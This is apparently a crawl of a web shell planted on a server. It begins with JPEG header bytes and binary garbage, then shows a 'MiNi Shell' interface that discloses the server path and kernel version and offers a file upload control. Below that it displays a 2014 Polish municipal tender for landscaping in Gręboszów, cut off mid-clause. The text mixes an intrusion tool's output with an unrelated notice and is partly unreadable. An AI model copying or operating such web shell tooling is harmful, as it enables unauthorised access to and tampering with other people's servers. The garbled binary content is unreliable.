JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140627/138887-N-2014.html

<p class="kh_header"><b>Gręboszów: Zagospodarowanie terenu centrum wsi Gręboszów i Zapasternicze</b><br>
<b>Numer ogłoszenia: 138887 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.greboszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu centrum wsi Gręboszów i Zapasternicze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest Zagospodarowanie terenu centrum wsi Gręboszów i Zapasternicze.
  2.  Zakres robót budowlanych obejmuje w szczególności: 
      1) zagospodarowanie terenu centrum wsi Gręboszów na działce nr 362 i 363/2:
          - utwardzenie powierzchni działki budowlanej  wraz z wydzieleniem miejsc parkingowych;
            nawierzchnia z kostki betonowej - 124 m2, nawierzchnia żwirowa - 240 m2
          - urządzenie terenu zieleni - 14 m2 
          - wyposażenie małej architektury;  dostawa i montaż ławek parkowych  szt 2,
     2) zagospodarowanie terenu centrum wsi Zapasternicze na działce nr 39/2 i 40:
          - utwardzenie powierzchni działki budowlanej;  nawierzchnia z kostki brukowej - 111 m2  



          - urządzenie terenu zieleni - 26 m2 
          - wyposażenie małej architektury; dostaw i montaż ławek parkowych  szt 2, dostawa i montaż stołu  wraz z dwoma 
            ławami - 1 kpl. 

  3. Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji projektowej i specyfikacjach  technicznych 
   wykonania i odbioru robót (STWiORB) , która jest dostępna w wersji elektronicznej na stronie internetowej  
   Zamawiającego, które stanowią  załącznik nr 10  i 11 do niniejszej SIWZ. 

  4.  W ramach realizacji przedmiotu zamówienia Wykonawca:    -   udzieli Zamawiającemu  na wykonany przedmiot 
    umowy 36 miesięcy gwarancji.

 
  5.  Wykonawca zobowiązuje się w szczególności do:
1)	terminowego wykonania przedmiotu Umowy z należytą starannością  zgodnie z Umową i harmonogramem rzeczowo-finansowym, 
2)	wykonania przedmiotu Umowy zgodnie  z Ofertą i Dokumentacją projektową, Specyfikacją techniczną wykonania 
i odbioru robót budowlanych (STWiORB) uzgodnieniami dokonanymi  w trakcie realizacji 
Umowy, zaleceniami nadzoru inwestorskiego i autorskiego, obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót,  Prawem budowlanym, zasadami wiedzy technicznej, z zachowaniem wymogów stawianych wyrobom budowlanym i urządzeniom dopuszczonym do obrotu i powszechnego stosowania w budownictwie oraz zachowania jakości robót określonych w dokumentacji projektowej i nie niższej niż zadeklarowano w ofercie. Zmiany określonych standardów wymagają pisemnej zgody Zamawiającego, 
3)	stosowania wyrobów budowlanych wprowadzonych do obrotu zgodnie z odpowiednimi przepisami, 
w szczególności ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 ze zm.),
4)	sporządzenia we własnym zakresie i na własny koszt Planu bezpieczeństwa i ochrony zdrowia na budowie przed przystąpieniem do robót, jeżeli taki obowiązek wynika z przepisu ustawy - Prawo budowlane,
5)	zapewnienia przestrzegania przepisów i zasad bhp oraz p. poż. we wszystkich miejscach wykonywania robót
 i miejscach składowania materiałów zgodnie z przepisami i dokumentacją techniczną oraz zapewnienia należytego porządku na terenie budowy i w jej otoczeniu, w tym na drogach dojazdowych,
6)	udziału w naradach koordynacyjnych budowy pracowników wskazanych przez  Wykonawcę, 
7)	prawidłowego i czytelnego prowadzenia dokumentacji budowy,
8)	 kompletowania i udostępniania Inspektorowi Nadzoru, sporządzonych w języku  polskim dokumentów typu: atesty materiałowe, deklaracje zgodności  dla  dostarczanych materiałów, aprobaty techniczne, wyniki badań laboratoryjnych  i technicznych  (tam, gdzie są wymagane), itp. Inspektor Nadzoru dokona akceptacji   materiałów przed wbudowaniem i urządzeń  przed zainstalowaniem dokonując odpowiednich zapisów opatrzonych datą na przedstawionych przez Wykonawcę atestach, aprobatach, deklaracjach zgodności, wnioskach o zatwierdzenie materiału do wbudowania czy urządzeniach do zainstalowania itp. Zakazuje się Wykonawcy  wbudowywania materiałów i instalowania urządzeń, które nie uzyskały akceptacji Inspektora Nadzoru.
9)	przeszkolenia wskazanych przez Użytkownika osób w zakresie obsługi instalacji  i urządzeń, jeżeli osoby takie zostaną wskazane,
10)	 aktualizacji harmonogramu rzeczowo- finansowego robót . Aktualizacja harmonogramu wymaga akceptacji Zamawiającego.

  6.   W celu wykonania swoich obowiązków Wykonawca zapewni swoim staraniem i na swój koszt:
1)	sporządzenie i uzgodnienie z nadzorem autorskim  oraz  Zamawiającym wszelkiej dokumentacji projektowej, która nie była dostarczona przez Zamawiającego, a której wykonanie jest niezbędne do kompleksowej realizacji przedmiotu umowy, przez co rozumie się w szczególności możliwość jego eksploatacji zgodnie z przeznaczeniem,
   2)  osoby odpowiedzialne za kierownictwo i nadzór nad realizowanymi robotami,
3)	organizację i utrzymanie zaplecza niezbędnego dla realizowanych robót, 
4)	gospodarowanie terenem budowy, od  momentu jego przejęcia od Zamawiającego aż do czasu wykonania 
i odbioru przedmiotu umowy, odpowiadając za wszelkie szkody powstałe na tym terenie. Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy i przekazania go Zamawiającemu 
w dniu zakończenia odbioru końcowego lub w terminie ustalonym w protokole odbioru,
5)	wykonanie zabezpieczenia budowy i jej ochrony w okresie realizacji umowy, aż do dnia przekazania wykonanych robót Zamawiającemu,
6)	zapewnienia we własnym zakresie i na własny koszt doprowadzenia do terenu budowy niezbędnych dla wykonania robót mediów, np.: energii elektrycznej, wody, odbioru ścieków itp., oraz zamontowania liczników i ponoszenia opłat na warunkach uzgodnionych z odpowiednimi instytucjami, dostawcami, odbiorcami, a także zawarcia w razie konieczności umów z dostawcami mediów (np. energii elektrycznej ) w zakresie niezbędnym do przeprowadzenia prób i odbiorów zamontowanych urządzeń technicznych i ponoszenia kosztów  z  tym związanych do dnia odbioru obiektu,
7)	organizację siły roboczej i pracy niezbędnych specjalistów wraz z nadzorem bezpośrednim nad robotami,

8)	pracę sprzętu budowlano - montażowego i środków transportu,
9)	dostawę wszelkich materiałów podlegających wbudowaniu, a wynikających z projektu i zakresu prac,
10)	właściwe warunki składowania materiałów i ich ochronę,
11)	zabezpieczenie terenu robót przed dostępem osób trzecich w sposób zapewniający bezpieczne ich prowadzenie, oznakowanie  terenu odpowiednimi tablicami informacyjnymi,
12)	prowadzenie robót w sposób nie powodujących szkód, w tym zagrożenia ludzi i mienia.
13)	Wykonawca bierze odpowiedzialność za szkody spowodowane uszkodzeniem urządzeń,  jak również 
za  szkody  oraz  następstwa  nieszczęśliwych  wypadków  powstałych  w  związku   z   prowadzonymi   robotami.
14)	Wykonawca bierze odpowiedzialność za ubezpieczenie budowy i robót z tytułu szkód, które mogą zaistnieć
 w związku z określonymi zdarzeniami losowymi, oraz od odpowiedzialności cywilnej.

    7.    Pieczę nad realizacją zamówienia sprawuje Inspektor Nadzoru , który koordynuje robotami, ocenia zgodność 
      realizacji przedsięwzięcia  z projektem, kontroluje jakość i ilość robót, opiniuje zasadność wykonania i rozliczenie 
      robót dodatkowych  i zamiennych, kontroluje rozliczenie finansowe budowy.

 8.    Zamawiający zastrzega, że wszystkie ewentualnie podane w SIWZ opisy nazw własnych  materiałów  (wyrobów) , 
     wyposażenia w sprzęt nie mają na celu naruszenia art.29 i 7 ustawy Pzp, a mają jedynie za zadanie  sprecyzowanie 
     oczekiwań jakościowych i technologicznych Zamawiającego. Należy   rozumieć to jako  określenie wymaganych 
     minimalnych parametrów  użytkowych, funkcjonalnych i technicznych   lub standardów jakościowych.  Oznacza to,  
     że zgodnie  z art. 29 ustawy , na wskazane z nazwy materiały  (wyroby) i wyposażenie w  sprzęt Zamawiający 
     dopuszcza   zastosowanie  równoważnych  materiałów  i wyrobów o nie gorszych parametrach użytkowych, 
     funkcjonalnych i technicznych  niż   opisane w  załącznikach do niniejszej SIWZ. Ciężar udowodnienia,  że materiał 
      (wyrób)  jest  równoważny w stosunku do  wymogu  określonego przez Zamawiającego spoczywa na  składającym   
     ofertę.  W takim przypadku  Wykonawca musi   przedłożyć odpowiednie dokumenty opisujące   parametry  
      techniczne, wymagane prawem  certyfikaty i inne  dokumenty dopuszczające dane materiały  (wyroby) 
     do  użytkowania, oraz pozwalające   jednoznacznie  stwierdzić, że są one rzeczywiście równoważne..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50 % wartości
      zamówienia podstawowego (art.67 ust.1 pkt 6 ustawy Pzp.).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.53-7, 45.23.32.22-1, 45.11.27.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie   1 000,00 zł, 
           słownie:  jeden tysiąc   złotych, które winno być wniesione  przed upływem terminu składania  ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
        spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena 
        spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
        na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył) co najmniej jedną  robotę budowlaną polegającą  na   
        utwardzeniu powierzchni działki budowlanej lub zagospodarowaniu terenu. Warunek zostanie uznany za spełniony 
        jeżeli wykonawca wykaże się wykonaniem  w zamówieniu co najmniej powierzchni 100 m2 utwardzenia terenu 
        kostką brukową   (np.: chodnik, plac,  parking) ,  o wartości  nie mniejszej niż 50 tys. zł brutto,  i  które zostało 
        wykonane w okresie   ostatnich 5 lat przed  upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności 
        jest krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty i miejsca wykonania oraz załączeniem 
        dowodów   dotyczących,  czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy zostały 
        wykonane  zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone.  
        Dowodami są poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym 
        charakterze wykonawca nie jest w stanie uzyskać  poświadczenia (wzór wykazu robót  - załącznik nr  4  do SIWZ).
                      Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez     
Wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie     
                     ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.
         Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, 
         na  zasadzie  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
         spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena 
         spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje  lub dysponować będzie do realizacji zamówienia osobą, która będzie 
         pełnić funkcję kierownika budowy,   posiadającą  uprawnienia budowlane    do kierowania robotami 
         budowlanymi w specjalności konstrukcyjno  - budowlanej, wpisaną do właściwej    izby samorządu 
         zawodowego, posiadającą aktualne ubezpieczenie od   odpowiedzialności cywilnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  w tym zakresie szczególnych wymagań,  w zakresie spełniania tego warunku. 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 
         do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez 
         Wykonawcę,  na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że zrealizował (zakończył) co najmniej jedną  robotę budowlaną polegającą  na   
        utwardzeniu powierzchni działki budowlanej lub zagospodarowaniu terenu. Warunek zostanie uznany za spełniony 
        jeżeli wykonawca wykaże się wykonaniem  w zamówieniu co najmniej powierzchni 100 m2 utwardzenia terenu 
        kostką brukową   (np.: chodnik, plac,  parking) ,  o wartości  nie mniejszej niż 50 tys. zł brutto,  i  które zostało 
        wykonane w okresie   ostatnich 5 lat przed  upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności 
        jest krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty i miejsca wykonania oraz załączeniem 
        dowodów   dotyczących,  czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy zostały 
        wykonane  zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca składa:
       1)  Formularz ofertowy (wzór -  załącznik nr 1 do SIWZ).
       2)  Kosztorys ofertowy (opis  sporządzenia w rozdziale  XVII)
       3)  Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo 
            do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku 
            gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie 
            do ewidencji działalności gospodarczej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana   postanowień   zawartej   umowy   może nastąpić  za zgodą obu  stron wyrażoną na   piśmie.   
   2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na 
     podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności 
     wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	Zmiana Terminu zakończenia robót;
a)   w przypadku wystąpienia Siły wyższej uniemożliwiającej wykonywanie przedmiotu Umowy zgodnie 
      z jej postanowieniami.   Przez Siłę wyższą, na potrzeby niniejszego warunku,  rozumieć należy zdarzenie 
     zewnętrzne wobec łączącej Strony więzi prawnej:
      -  o charakterze  niezależnym od Stron,
   -  którego Strony nie mogły przewidzieć przed zawarciem umowy, 
             -  którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej 
         staranności,
     -  której nie można przypisać drugiej Stronie.




      Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne 
      klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania 
      warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie 
       lub skażenia;
b)  gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót,
      w szczególności z powodu technologii realizacji robót określonych Umową, normami lub innymi 
      przepisami, wymagających konkretnych  warunków atmosferycznych, jeżeli konieczność wykonania 
      robót w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,  
c)   gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania 
      przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielania zamówień 
      uzupełniających,  które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia 
      niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty 
      inwestycjami w zakresie niezbędnym  do uniknięcia lub usunięcia tych kolizji,
           d)   zmiany będące następstwem okoliczności leżących po stronie Zamawiającego  w szczególności; 
